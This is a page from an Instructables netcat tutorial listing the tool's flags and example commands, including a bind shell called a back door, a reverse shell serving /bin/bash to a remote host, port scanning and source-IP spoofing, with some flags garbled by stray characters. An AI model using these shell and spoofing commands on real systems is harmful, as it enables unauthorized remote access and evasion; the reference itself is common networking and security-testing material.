Instructables

More Fun with netcat!!

Step 2: Basic Netcat commands

Picture of Basic Netcat commands
-e prog inbound program to exec (dangerous!!)
-g gateway source-routing hop point(s), up to 8
-G num source-routing pointer: 4, 8, 12, ...
-h this cruft
-i secs delay interval for lines sent, ports scanned
-l listen mode, for inbound connects
-L listen harder, re-listen on socket close
-n numeric-only IP addresses, no DNS
-o file hex dump of traffic
-p port local port number
-r randomize local and remote ports
-s addr local source address
-t answer TELNET negotiation
-u UDP mode
-v verbose (use twice to be more verbose)
-w secs timeout for connects and final net reads
-z zero-I/O mode (used for scanning)
port numbers can be individual or ranges: m-n (inclusive)

Connect to a port on
a remote host

nc remote_host <port>

Connect to multiple
ports on a remote host

nc remote_host <port>...<port>
For example:
nc www.somecompanyasanexample.com 21 25 80

Listen on a port for
incoming connections
(Also know as A Back Door)

nc -v -l -p <port>

Connect to remote host
and serve a bash shell

nc remote_ip <port> -e /bin/bash
Note that Netcat does not support the -e flag by default. To
make Netcat support the -e flag, it must be re-compiled with
the DGAPING_SECURITY_HOLE option


Listen on a port and
serve a bash shell
upon connect

nc -v -l -p <port> -e /bin/bash
Note that Netcat does not support the -e flag by default. To
make Netcat support the -e flag, it must be re-compiled with
the DGAPING_SECURITY_HOLE option


Port scan a remote
host

nc -v -z remote_host <port>-<port>
Use the -i flag to set a delay interval:
nc -œi <seconds> -v -z remote_host
<port>-<port>

Pipe command output
to a netcat request


<command> | nc remote_host <port>
For example:
echo "GET / HTTP/1.0
(enter)
(enter)
"| nc www.somecompanyasanexample.com 80


Use source-routing to
connect to a port on a
remote host

nc -œg <gateway> remote_host <port>
Note: Up to eight hop points may be specified using the -g flag.
Use the -œG flag to specify the source-routing pointer.


Spoof source IP
address

Use the -œs flag to spoof the source IP address:
nc -s spoofed_ip remote_host port
This command will cause the remote host to respond back to the
spoofed IP address. The -œs flag can be used along with most of
the commands presented in this table.


Transfer a file

On the server host:
nc -v -l -p <port> < <file>
On the client host:
nc -v <server_host> <port> > <file>
It is also possible for the client host to listen on a port in order to
receive a file. To do this, run the following command on the client
host:
nc -v -l -p <port> > file
And run the following command on the server host:
nc -œv <client_host> <port> < file

These can all be used by your netcat

 
Remove these adsRemove these ads by Signing Up